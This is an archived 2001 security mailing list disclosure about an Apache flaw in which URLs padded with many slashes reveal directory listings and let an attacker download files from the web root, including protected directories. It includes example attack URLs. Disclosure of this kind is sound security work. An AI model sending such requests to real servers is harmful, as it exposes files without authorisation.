-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Apache Artificially Long Slash Path Directory Listing Vulnerability BUGTRAQ ID 2503 I'm not really sure if this is a known issue, but here goes: Old news: As the vulnerability's description describes, any user with a web browser can obtain directory listing of the Apache http root directory, even if the directory contains an index.html file and is password protected. New news: You can access files/directories under the http root by subtracting the number of slashes from the appended url equal to the number of characters in the file or directory name you are attempting to access. Example: Standard Directory List: http://15.16.17.18//////////////////////////////////////////////////// //////////////// Download an Arbitrary file: http://15.16.17.18//////////////////////////////////////////////////// ////thisfile.txt Or In a Directory: http://15.16.17.18////////////////////////////////////////////////subd ir1/thisfile.txt I've made no attempt to contact The Apache Group to discuss this as it is the result of a known vulnerability and patches have already been released to fix vulnerable systems. Brian Dinello Security Consultant VigilantMinds, Inc. brian.dinelloat_private -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com> iQA/AwUBO2A9ma1dkgK5UcWTEQIa4wCfXK2NheBMvCb67CSOXBGpGoXEkfsAoNOC ZjyC05S8XddgUvLifLIIvx2o =Fz1o -----END PGP SIGNATURE-----
This archive was generated by hypermail 2b30 : Thu Jul 26 2001 - 14:58:39 PDT